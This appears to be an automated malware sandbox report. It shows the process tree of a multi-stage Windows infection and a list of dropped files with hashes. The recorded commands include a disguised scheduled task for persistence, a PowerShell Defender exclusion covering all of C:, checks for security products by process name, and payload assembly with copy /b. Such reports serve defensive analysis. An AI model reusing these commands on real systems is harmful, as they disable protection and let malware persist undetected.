                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /create /f /sc minute /mo 30 /tn "Microsoft DotNet Kernel" /tr "C:\Users\Admin\AppData\Roaming\xdwdmicrosoft.exe" /RL HIGHEST
                                      8⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:4552
                                  • C:\Users\Admin\AppData\Roaming\xdwdkernel.exe
                                    "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    PID:3580
                                • C:\Users\Admin\AppData\Local\Temp\10395740101\TbV75ZR.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10395740101\TbV75ZR.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:5596
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                    7⤵
                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                    • System Location Discovery: System Language Discovery
                                    PID:4584
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4584 -s 496
                                      8⤵
                                      • Program crash
                                      PID:4924
                                • C:\Users\Admin\AppData\Local\Temp\10395750101\z85yd_003.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10395750101\z85yd_003.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: MapViewOfSection
                                  PID:3832
                                  • C:\Windows\SYSTEM32\cmd.exe
                                    cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                    7⤵
                                      PID:372
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                        8⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Loads dropped DLL
                                        PID:4216
                                    • C:\Windows\system32\svchost.exe
                                      "C:\Windows\system32\svchost.exe"
                                      7⤵
                                      • Downloads MZ/PE file
                                      • Loads dropped DLL
                                      • Adds Run key to start application
                                      PID:2136
                                      • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                        8⤵
                                        • Sets service image path in registry
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious behavior: LoadsDriver
                                        PID:1128
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell Remove-MpPreference -ExclusionPath C:\
                                          9⤵
                                          • Loads dropped DLL
                                          PID:4172
                                      • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                        8⤵
                                        • Deletes itself
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:3208
                                  • C:\Users\Admin\AppData\Local\Temp\10395760101\EPTwCQd.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10395760101\EPTwCQd.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:2368
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                      7⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1096
                                  • C:\Users\Admin\AppData\Local\Temp\10395780101\Rm3cVPI.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10395780101\Rm3cVPI.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:8116
                                  • C:\Users\Admin\AppData\Local\Temp\10395790101\7IIl2eE.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10395790101\7IIl2eE.exe"
                                    6⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • Drops file in Windows directory
                                    • System Location Discovery: System Language Discovery
                                    PID:8852
                                    • C:\Windows\SysWOW64\CMD.exe
                                      "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                      7⤵
                                        PID:9044
                                        • C:\Windows\SysWOW64\tasklist.exe
                                          tasklist
                                          8⤵
                                          • Enumerates processes with tasklist
                                          • System Location Discovery: System Language Discovery
                                          PID:12848
                                        • C:\Windows\SysWOW64\findstr.exe
                                          findstr /I "opssvc wrsa"
                                          8⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:12868
                                        • C:\Windows\SysWOW64\tasklist.exe
                                          tasklist
                                          8⤵
                                          • Enumerates processes with tasklist
                                          • System Location Discovery: System Language Discovery
                                          PID:13036
                                        • C:\Windows\SysWOW64\findstr.exe
                                          findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                          8⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:13056
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c md 418377
                                          8⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:13148
                                        • C:\Windows\SysWOW64\extrac32.exe
                                          extrac32 /Y /E Leon.cab
                                          8⤵
                                            PID:6876
                                          • C:\Windows\SysWOW64\findstr.exe
                                            findstr /V "BEVERAGES" Compilation
                                            8⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4168
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                                            8⤵
                                              PID:7176
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                                              8⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:7420
                                            • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                                              Passwords.com N
                                              8⤵
                                              • Executes dropped EXE
                                              • Suspicious use of FindShellTrayWindow
                                              • Suspicious use of SendNotifyMessage
                                              PID:7656
                                            • C:\Windows\SysWOW64\choice.exe
                                              choice /d y /t 5
                                              8⤵
                                                PID:7884
                                          • C:\Users\Admin\AppData\Local\Temp\10395800101\caac67f5c0.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10395800101\caac67f5c0.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Suspicious use of SetThreadContext
                                            PID:10760
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                              7⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:10868
                                          • C:\Users\Admin\AppData\Local\Temp\10395810101\8adb59ee74.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10395810101\8adb59ee74.exe"
                                            6⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Writes to the Master Boot Record (MBR)
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            PID:7568
                                          • C:\Users\Admin\AppData\Local\Temp\10395820101\1a3958728d.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10395820101\1a3958728d.exe"
                                            6⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:8748
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
                                  1⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:4724
                                  • C:\Windows\system32\rundll32.exe
                                    rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
                                    2⤵
                                      PID:2456
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\MSBuild.exe
                                    1⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:3228
                                    • C:\Users\Admin\AppData\Roaming\MSBuild.exe
                                      C:\Users\Admin\AppData\Roaming\MSBuild.exe
                                      2⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      PID:5492
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
                                    1⤵
                                      PID:5388
                                      • C:\Windows\system32\rundll32.exe
                                        rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
                                        2⤵
                                          PID:5964
                                      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                        C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                        1⤵
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Identifies Wine through registry keys
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:2456
                                      • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                        C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                        1⤵
                                        • Executes dropped EXE
                                        PID:3864
                                      • C:\Users\Admin\AppData\Roaming\MSBuild.exe
                                        C:\Users\Admin\AppData\Roaming\MSBuild.exe
                                        1⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        PID:1612
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4584 -ip 4584
                                        1⤵
                                          PID:5084
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                          1⤵
                                            PID:4608
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                            1⤵
                                              PID:3916
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3680 -ip 3680
                                              1⤵
                                                PID:6940
                                              • C:\Windows\system32\regsvr32.EXE
                                                C:\Windows\system32\regsvr32.EXE /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\1wlanapi.ocx"
                                                1⤵
                                                • Loads dropped DLL
                                                PID:7864
                                                • C:\Windows\SysWOW64\regsvr32.exe
                                                  /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\1wlanapi.ocx"
                                                  2⤵
                                                  • Loads dropped DLL
                                                  PID:536
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
                                                    3⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    PID:3488
                                              • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                1⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:8176
                                              • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                1⤵
                                                • Executes dropped EXE
                                                PID:9160
                                              • C:\Users\Admin\AppData\Roaming\MSBuild.exe
                                                C:\Users\Admin\AppData\Roaming\MSBuild.exe
                                                1⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:10032
                                              • C:\Users\Admin\AppData\Roaming\xdwdkernel.exe
                                                C:\Users\Admin\AppData\Roaming\xdwdkernel.exe
                                                1⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                PID:10512
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5824 -ip 5824
                                                1⤵
                                                  PID:7184

                                                Network

                                                MITRE ATT&CK Enterprise v15

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\Users\Admin:.repos

                                                  Filesize

                                                  1.2MB

                                                  MD5

                                                  3a8a44a889c7970e9b56fe83ae3b1f3d

                                                  SHA1

                                                  48813941503c4954c9c3de30bc9c866001bcf03c

                                                  SHA256

                                                  656e977e341e08c3d14820a341a913108ca3534ebb7adee99aff4d098cf1f1c6

                                                  SHA512

                                                  a3cbc8e90c979baee3e624441ac5d544527d9db9f35d533fbb64b816730b0634b152718cc524120c9a3b18156fcf48883436a2254179065a289f5795e509a2e2

                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                  Filesize

                                                  2KB

                                                  MD5

                                                  d85ba6ff808d9e5444a4b369f5bc2730

                                                  SHA1

                                                  31aa9d96590fff6981b315e0b391b575e4c0804a

                                                  SHA256

                                                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                  SHA512

                                                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

                                                  Filesize

                                                  841B

                                                  MD5

                                                  0efd0cfcc86075d96e951890baf0fa87

                                                  SHA1

                                                  6e98c66d43aa3f01b2395048e754d69b7386b511

                                                  SHA256

                                                  ff981780f37479af6a428dd121eef68cf6e0b471ae92f080893a55320cc993f7

                                                  SHA512

                                                  4e79f5a8494aac94f98af8dbbc71bdd0a57b02103757ad970da7e7d4e6a0dc5015ca008256a6bd2c5bdec3a0f5736a994e17b3ef004b0f374a3339e480ac41b1

                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                  Filesize

                                                  2KB

                                                  MD5

                                                  25604a2821749d30ca35877a7669dff9

                                                  SHA1

                                                  49c624275363c7b6768452db6868f8100aa967be

                                                  SHA256

                                                  7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

                                                  SHA512

                                                  206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\15AV87NZ\service[1].htm

                                                  Filesize

                                                  1B

                                                  MD5

                                                  cfcd208495d565ef66e7dff9f98764da

                                                  SHA1

                                                  b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                  SHA256

                                                  5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                  SHA512

                                                  31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\7IDDKYHZ\dll[1]

                                                  Filesize

                                                  236KB

                                                  MD5

                                                  2ecb51ab00c5f340380ecf849291dbcf

                                                  SHA1

                                                  1a4dffbce2a4ce65495ed79eab42a4da3b660931

                                                  SHA256

                                                  f1b3e0f2750a9103e46a6a4a34f1cf9d17779725f98042cc2475ec66484801cf

                                                  SHA512

                                                  e241a48eafcaf99187035f0870d24d74ae97fe84aaadd2591cceea9f64b8223d77cfb17a038a58eadd3b822c5201a6f7494f26eea6f77d95f77f6c668d088e6b

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  16KB

                                                  MD5

                                                  6314f4cd13bd419d64078d1d2e8e4561

                                                  SHA1

                                                  14deb1a5c6665c89fb012fa4c7d7c6518e2cd263

                                                  SHA256

                                                  8b1f8adaad647560acf467ad192218c5807a6b4cef427903fdf6be0226401bf0

                                                  SHA512

                                                  78469ae50dbc872dd713ab8b9dab588effc15eb35ce292dcbf98bbc31f67bdbe4f306fccd3a22f4a74ca3a879f49d03071c2aada319e5bf32c13c40e52304a10

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  20KB

                                                  MD5

                                                  de60b717433a9e06eeddc94750456caa

                                                  SHA1

                                                  f4843aff6841fc79e75b0aee330adf576c8b7cf2

                                                  SHA256

                                                  fdf536869482bf2786a5cbd6b232622a1ef6adbe83f3eb450c00425584156ef1

                                                  SHA512

                                                  cc514bb045c21233329540066dba3be4b4c402479407cc47b777a29c525f0e0b50f247e4191c2d668431342f6ab9d51405c44932f1ec647a5fe6c0679e236bc2

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  21KB

                                                  MD5

                                                  a4ebf2e5efbe50347c9a93e163ec800b

                                                  SHA1

                                                  5da3ebc54e3bed737ee259a67b3e15d801e980d5

                                                  SHA256

                                                  cfbb841de1cf8665c75343b7bc1bf0534902e31bc865aaa34010e5f83a4b8287

                                                  SHA512

                                                  f31c7d5be0ebd500db986af853a0e7cb42d4636d3ceb020164ba040866f12ec9a7a09f9d5f0dd3598df141731c4bf199fcfccf92fcc386eee117815133eb6549

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  20KB

                                                  MD5

                                                  f5d7ea06c328a4ff28e38016c60fda4d

                                                  SHA1

                                                  93130b013ae3fb9c188d79bc256f3863d6321656

                                                  SHA256

                                                  06f483795966910584eca032005fe2d79908ecca23f1142269157cdb2bd603b6

                                                  SHA512

                                                  24426e8215ffbedb5d3a52921bb472650532c45a2643f8fc92989c540c6422694fde5837df5a5d69e93d23de810e9f79a9f8dc9f6674765b5a026c56d6fb081c

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  bde1c782de166c67d570341214e9397f

                                                  SHA1

                                                  7d377ab775f8a02d0ec16f699ff2bfbf1e0d4936

                                                  SHA256

                                                  af0fc430bd5bfca3f1d386c32f32b2e28768d30e6efc657cc016930747c9fd6e

                                                  SHA512

                                                  8fa8f5aac6ebe5330aef6a55321aa8b5933b2859dc84c7f5eb73e17cb94b07013b0420319773c329a5fe5e1fff08a1613a026bea7da8d5abb7f0133b4ce25f60

                                                • C:\Users\Admin\AppData\Local\Temp7OXP6VS20BHKMGLFLUOE0MMA1ADK6XTD.EXE

                                                  Filesize

                                                  1.8MB

                                                  MD5

                                                  6385881e5ff66c6855a2fbab086053a0

                                                  SHA1

                                                  949879d9e31500e815de723702948a09bafd029e

                                                  SHA256

                                                  a7a94eefe57a756a4daad27d5fc7ba94225f9d206017cd86d0f9e58949ca5982

                                                  SHA512

                                                  4ef8abea83f69a71be676030a5cfbe69d27188f5f6ce6a9bec69037aa2ba00b45bbc50353db48386432416a4c91068578a74098ecfb502bea019a3989f5dd92b

                                                • C:\Users\Admin\AppData\Local\Temp\0Nwf4eJFfGGfFv0V2sKGD3fRef\YCL.exe

                                                  Filesize

                                                  3.0MB

                                                  MD5

                                                  2cb4cdd698f1cbc9268d2c6bcd592077

                                                  SHA1

                                                  86e68f04bc99f21c9d6e32930c3709b371946165

                                                  SHA256

                                                  c89a0fea7c3850c8bf4b6a231a34cfb699c97783b1b2b1176070dd4d9cb4bd4a

                                                  SHA512

                                                  606216ce50d2c89f4700fd3f8853b09f5626615cac64bfe304c15524a908b4a220abed1a023b0f099d390a2e5b14e1dc4f94840aa398658188ad299c93939de3

                                                • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe

                                                  Filesize

                                                  1.7MB

                                                  MD5

                                                  6d7adc96b310e80799325edca02ff778

                                                  SHA1

                                                  35d97327d3d1c5ce920051d0552b2ee510bb919d

                                                  SHA256

                                                  e5186a04536313599bea259d6fefac44b168d81e08dcc36e54b2c6ff08374efd

                                                  SHA512

                                                  feb351fa6d4f4d342ff8456812fd2c9dfba8122b94e6c2d11ec4b045f4975d9f0dc2b6388d9e4c6d4ab98287bc6dc56369e5c96f10cf0b62ad7a2f81ba821212

                                                • C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe

                                                  Filesize

                                                  1.1MB

                                                  MD5

                                                  3928c62b67fc0d7c1fb6bcce3b6a8d46

                                                  SHA1

                                                  e843b7b7524a46a273267a86e320c98bc09e6d44

                                                  SHA256

                                                  630e00afe98ad4c1db391b74a84b7822a3abb3867a34f2ba163a8bf26d8d4397

                                                  SHA512

                                                  1884b125c89e32b6e5924e87ad9af827ae7e950ac80411e00a58c465eed88060af72142f9c512e0323e1ade46061f56a5247351e1c1d5e268f2ba35b5e447857

                                                • C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe

                                                  Filesize

                                                  2.0MB

                                                  MD5

                                                  28b543db648763fac865cab931bb3f91

                                                  SHA1

                                                  b6688b85d6c6d1bd45a3db2d108b6acf7467b0b4

                                                  SHA256

                                                  701b7ef0b368ddbe9e3d2ddaaaf10284287f38799e536336dc4c821930f13906

                                                  SHA512

                                                  7d514fc036efc8d57d400e7e84f5b565f40dc0f74a536c708b3fe5d6725e5d4541157e29f514e0706fad6d4159e0b863bedf757eca4df3e87927e462502a02d2

                                                • C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe

                                                  Filesize

                                                  7.6MB

                                                  MD5

                                                  38a583b3d925ecb065f53b0389ff7902

                                                  SHA1

                                                  aa167290abd6fec68f1891d45a77a5b7415eb722

                                                  SHA256

                                                  d65a48eeadf763323cd308054bcef2d5f7bec8cf3a596ad097348b698115379e

                                                  SHA512

                                                  682e7e4491d80e03ba3eed9d7e5357f3274f767f70fbccc37907949d79886ebe771f847e277abcc9ca4d57eb0eed9c5cdd0284a030f5dfd9eceb3371e9291c8c

                                                • C:\Users\Admin\AppData\Local\Temp\10045350101\kololololo.exe

                                                  Filesize

                                                  1.2MB

                                                  MD5

                                                  646254853368d4931ced040b46e9d447

                                                  SHA1

                                                  c9e4333c6feb4f0aeedf072f3a293204b9e81e28

                                                  SHA256

                                                  5a6764d23bb3d50f08f15b95e214a6dca0afb78e7416a21b72982c3649a49e9e

                                                  SHA512

                                                  485f252cd358ea41be648e013dc3ddeee1e57f8dea3ef42a5c8236a9769e7ebcf8bae1d5a36f55b6fb2cdcbbcf1878eca7d7885b63445cb081688a9512512819

                                                • C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe

                                                  Filesize

                                                  2.1MB

                                                  MD5

                                                  2a3fbf508bbf6c77fb9138e6bdc0c114

                                                  SHA1

                                                  8de41763cb3b5011ef1bb611fc258184b24ca258

                                                  SHA256

                                                  b87944aaa06658715496841be98f0f4791165f2d0d2a85267bf5fc80ef59f74f

                                                  SHA512

                                                  ed5cc3d07923986cc2751d1e5d833fc2a83de70fb68926378b9dbb0d83506ca7af39ce3a9bc46461c96bf5c2a35c04e106d56296b0d010a64a6c128057a9c84a

                                                • C:\Users\Admin\AppData\Local\Temp\10046340101\466cf5974c.exe

                                                  Filesize

                                                  1.3MB

                                                  MD5

                                                  09232161939bec92432fe5751b7cd092

                                                  SHA1

                                                  b5da678663e7adfc4a85b096e94fa5d4ba0ccc20

                                                  SHA256

                                                  f741a6cfbd22e05821557394ea54651c78882c16e1ce667ef0343957abe201a0

                                                  SHA512

                                                  914f26d4f6917a1d8eb3f9a5b33f63671fe3586d54efff2043ca16186bf1fa7859246062262d1fd2dca7f8571260aa027d6cca42a7e4881aead8f29a7276f119

                                                • C:\Users\Admin\AppData\Local\Temp\10394600101\18f71bf7e7.exe

                                                  Filesize

                                                  3.7MB

                                                  MD5

                                                  7462fa129378900e984f4541966acd67

                                                  SHA1

                                                  a49b13bc9fe5f88af2d65b169e8757343f2e6717

                                                  SHA256

                                                  5e98318f45992c965d704da6f15721df3948dd22ddbea496430c62d92542e6e0

                                                  SHA512

                                                  2ad140326d6a7caef05cf3402f9238baf3f70e3856dd5bcdc2a054ac97c3893409f9912470156073ded622395572a40380bef33d4052a916751562e8cf5d37a7

                                                • C:\Users\Admin\AppData\Local\Temp\10394640101\amnew.exe

                                                  Filesize

                                                  429KB

                                                  MD5

                                                  22892b8303fa56f4b584a04c09d508d8

                                                  SHA1

                                                  e1d65daaf338663006014f7d86eea5aebf142134

                                                  SHA256

                                                  87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f

                                                  SHA512

                                                  852dcc1470f33bc601a814f61a37c1f5a10071ff3354f101be0ef9aa5ac62b4433a732d02acd4247c2a1819fef9adef7dd6722ee8eb9e8501bac033eb877c744

                                                • C:\Users\Admin\AppData\Local\Temp\10395570101\1Hoz3Kt.exe

                                                  Filesize

                                                  1.1MB

                                                  MD5

                                                  99786ffb15648a706671087549727e26

                                                  SHA1

                                                  b7dfc116609a001651d03e1e273a79f82c902452

                                                  SHA256

                                                  368baab68b40065e0fcfdde019a2fdd3fe3b385ca39cbb00622e71dc677122a2

                                                  SHA512

                                                  9348a2697d27c02e01ddad6218b3b8644566de377a17ef86d7c96b28c7403e7f6c1db62c510e7f7ca1da52163d1648584de2c96d7c43e76832cc35a4e2ee52d3

                                                • C:\Users\Admin\AppData\Local\Temp\10395640101\ZzvSz9G.exe

                                                  Filesize

                                                  2.0MB

                                                  MD5

                                                  e5f1ecadd319d48dc80f692e52e755a7

                                                  SHA1

                                                  6c3278a974ff2505ac3a824a7ace6aa021ace1a1

                                                  SHA256

                                                  deffdd096e229c29c65584238c907ed7c56a4f6f7827a9c798c7253eba7036b2

                                                  SHA512

                                                  5669da2f4b16ce90aee638155cbeb354abb8f04c3d9cfa2f3f3139cea3c33e056e3cbd38152bf498feb6ac1fa9a4002ab4cec7fc6905216f17409c0c163528bb

                                                • C:\Users\Admin\AppData\Local\Temp\10395660101\851cc55f77.exe

                                                  Filesize

                                                  4.5MB

                                                  MD5

                                                  24eb32efb229678f549fba2a32c65493

                                                  SHA1

                                                  6378c29de465372e392d411dfeab668f25eff964

                                                  SHA256

                                                  c8df97101296f673f902641eece81653d575a02dbe7354910273932948a332c6

                                                  SHA512

                                                  dcf3ac17ddb767c4c51d9b0d0a58beec16e80c0c529b657e25a73cf33520f0851d52fe1eb2c4fdd8915952be66ebae943f0b426742839dadcb6bb0014598ab48

                                                • C:\Users\Admin\AppData\Local\Temp\10395670101\b3b3a25713.exe

                                                  Filesize

                                                  4.4MB

                                                  MD5

                                                  59f33b6e3c545e4e0ff247187f6e9b3d

                                                  SHA1

                                                  166d582a86150b3e9228682f16e0c44c8f6fa630

                                                  SHA256

                                                  2c0cec3818c74ee5ed782c7118e4ca0bd4989f3fa1beeef47f77f11e43997777

                                                  SHA512

                                                  cb7dca00a7bbb90bc05d829a46f2a7ae29baf37114f38a6b8cf1c59e71681290a9f7a5c77bbebb2b18f2d1520a42088369e13dc1152eadb1c1ecf5df4edfad03

                                                • C:\Users\Admin\AppData\Local\Temp\10395710101\gLLOqKC.exe

                                                  Filesize

                                                  1.9MB

                                                  MD5

                                                  55b52eaccfd383e87260165eeb05c593

                                                  SHA1

                                                  417eeefdeccf869793f1be57a2994eeffa53f2de

                                                  SHA256

                                                  70644ea317eba869340837f59f70987abac16b2a10a6a70a153130c6d0915707

                                                  SHA512

                                                  3309270cedd9e5af782785437be484496e7bde7ff4bc111e2bcd71005de7c61ddb6f6f47246589632fc353f1aae2285bac48b4339b7a6b7af9d71cb073bfa88f

                                                • C:\Users\Admin\AppData\Local\Temp\10395720101\a.exe

                                                  Filesize

                                                  19B

                                                  MD5

                                                  595e88012a6521aae3e12cbebe76eb9e

                                                  SHA1

                                                  da3968197e7bf67aa45a77515b52ba2710c5fc34

                                                  SHA256

                                                  b16e15764b8bc06c5c3f9f19bc8b99fa48e7894aa5a6ccdad65da49bbf564793

                                                  SHA512

                                                  fd13c580d15cc5e8b87d97ead633209930e00e85c113c776088e246b47f140efe99bdf6ab02070677445db65410f7e62ec23c71182f9f78e9d0e1b9f7fda0dc3

                                                • C:\Users\Admin\AppData\Local\Temp\10395730101\nAM5wkr.exe

                                                  Filesize

                                                  180KB

                                                  MD5

                                                  62458154158eb08dd28fdbf62469e4c8

                                                  SHA1

                                                  6ce11d490152999b61a5186c8ea0b71a9159a659

                                                  SHA256

                                                  c0fad729097860c1e9777f60c6519c3a772b005b4c6c990534e17a9c51b2d755

                                                  SHA512

